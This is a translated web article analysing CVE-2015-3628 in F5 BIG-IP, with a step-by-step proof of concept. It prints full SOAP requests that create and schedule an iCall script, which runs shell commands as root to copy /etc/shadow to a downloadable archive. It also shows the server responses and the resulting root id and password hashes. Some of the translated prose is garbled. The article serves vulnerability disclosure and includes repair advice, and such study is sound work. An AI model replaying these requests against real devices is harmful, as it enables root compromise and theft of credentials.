Analysis of privilege escalation vulnerability using F5 ICall script (CVE-2015-3628)

Last Update:2015-12-18 Source: Internet

Author: User

Tags cve

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Analysis of privilege escalation vulnerability using F5 ICall script (CVE-2015-3628)

Earlier this year, GDS found a vulnerability in F5 BIG-IP LTM that allows restricted users to access the system for extraction and remote command execution after successful Elevation of Privilege.

This article will show you how to manually exploit this vulnerability. Metasploit has also added corresponding modules. For details, see https://www.rapid7.com/db/modules/exploit/linux/http/f5_icall_cmd.

Summary

The problem with this vulnerability is that the SOAP interface is exposed to https: // iControl/iControlPortal. cgi (this small problem was previously encountered in the CVE-2014-2928 ). Attackers with valid Web interface access permissions and Resource Administrator roles can abuse the iCall SOAP function to execute arbitrary commands on the device as root.

You can use the iCall interface to create and run management scripts, which will be run by the Tcl interpreter as root. For specific affected versions, see F5 Security Advisory.

POC

The following describes how to view the "/etc/shadow" file (a file containing the password hash value on the device. Using the same method, we can also get a command line shell with the root permission.

For demonstration, we first create a user named "test" on the target device, whose password is "default" and has the role "Resource Administrator. This user is not allowed to use any shell.

The following http post request will create an iCall script on the target device. We will convert payload exec/bin/sh-c "id>/var/local/ucs/file. ucs; cat/etc/shadow>/var/local/ucs/file. ucs; chmod a + r/var/local/ucs/file. highlighted in red.

The script does not have any output. However, the script copies the "/etc/shadow" file to the directory where the backup configuration is stored. Here we can access it through the Web interface, which will be demonstrated later. At the same time, we recorded the output after the id command is executed to demonstrate that we are indeed running with the root permission.

Request:POST /iControl/iControlPortal.cgi HTTP/1.1Accept-Encoding: gzip,deflateContent-Type: text/xml;charset=UTF-8SOAPAction: urn:iControl:iCall/ScriptHost: 10.0.0.249Content-Length: 866Authorization: Basic dGVzdDpkZWZhdWx0= xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:scr="urn:iControl:iCall/Script" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">   soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">exploit xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">exec /bin/sh -c "id>/var/local/ucs/file.ucs;cat /etc/shadow >>/var/local/ucs/file.ucs;chmod a+r /var/local/ucs/file.ucs"  Response:HTTP/1.1 200 OKDate: Fri, 26 Jun 2015 14:30:32 GMTServer: ApacheSOAPServer: EasySoap++/0.6X-Frame-Options: SAMEORIGINContent-Type: text/xml; charset="UTF-8"Content-Length: 428 xmlns:E="http://schemas.xmlsoap.org/soap/envelope/"xmlns:A="http://schemas.xmlsoap.org/soap/encoding/"xmlns:s="http://www.w3.org/2001/XMLSchema-instance"xmlns:y="http://www.w3.org/2001/XMLSchema"xmlns:iControl="urn:iControl"E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  xmlns:m="urn:iControl:iCall/Script">

Different types of processing methods are provided to execute the script iCall interface. In this case, PeriodicHandler is used to process the following requests.

POST /iControl/iControlPortal.cgi HTTP/1.1Accept-Encoding: gzip,deflateContent-Type: text/xml;charset=UTF-8SOAPAction: urn:iControl:iCall/PeriodicHandlerHost: 10.0.0.249Content-Length: 923Authorization: Basic dGVzdDpkZWZhdWx0= xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:per="urn:iControl:iCall/PeriodicHandler" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">   soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">exploitHandler  xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">/Common/exploit  xsi:type="urn:Common.ULongSequence" soapenc:arrayType="xsd:long[]" xmlns:urn="urn:iControl">30   Response:HTTP/1.1 200 OKDate: Fri, 26 Jun 2015 14:36:30 GMTServer: ApacheSet-Cookie: BIGIPAuthCookie=E41B1D179BD9DBF88AF1FF43F2390E5ED6BD6199; path=/; Secure;Set-Cookie: BIGIPAuthUsernameCookie=test; path=/; Secure;SOAPServer: EasySoap++/0.6X-Frame-Options: SAMEORIGINContent-Type: text/xml; charset="UTF-8"Content-Length: 428 xmlns:E="http://schemas.xmlsoap.org/soap/envelope/"xmlns:A="http://schemas.xmlsoap.org/soap/encoding/"xmlns:s="http://www.w3.org/2001/XMLSchema-instance"xmlns:y="http://www.w3.org/2001/XMLSchema"xmlns:iControl="urn:iControl"E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  xmlns:m="urn:iControl:iCall/PeriodicHandler">

The script is executed every 30 seconds.

To view the file, you need to log on to the device and view it in System-> Archives, as shown below:

Download the file containing the command output. The result is as expected:

$ cat file.ucsuid=0(root) gid=0(root) context=system_u:system_r:init_troot:$1$8kIUIrbb$b7FOEXTrKOiOgJ1w0T78F/:16496:0:99999:7:::bin:*:16153::::::daemon:*:16153::::::adm:*:16153::::::lp:*:16153::::::mail:*:16153::::::uucp:*:16153::::::operator:*:16153::::::nobody:*:16153::::::tmshnobody:*:16153::::::admin:$1$VFlFWR0F$iIy0wXSbTl4EpmMYPnX1A.:16496:0:99999:7:::apache:!!:16153::::::mysql:!!:16153::::::vcsa:!!:16153::::::oprofile:!!:16153::::::sshd:!!:16153::::::syscheck:!!:16153::::::rpc:!!:16153::::::f5_remoteuser:!!:16153::::::pcap:!!:16153::::::tomcat:!!:16153::::::ntp:!!:16153::::::named:!!:16153::::::test:$1$SO17paaX$hNC27dZsBM9l3kSFuY/h9.:16500:0:99999:7:::

Repair

Patch. If the patch does not work, check whether the "Resource Administrator" role exists in all accounts. Update the configuration to only provide the minimum permission, at the same time, you must realize that the "Resource Administrator" role may have unrestricted permissions.

Disclosure timeline

-Vulnerability report to F5 Security Team

-F5 confirm the vulnerability and provide the affected version

-F5 updated version 12.0.0 fixed the Vulnerability

-F5 released version 11.5.3 HF2 fixed the Vulnerability

-F5 released version 11.6.0 HF6 fixed the Vulnerability

2015/11/19-Metasploit released attack modue

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More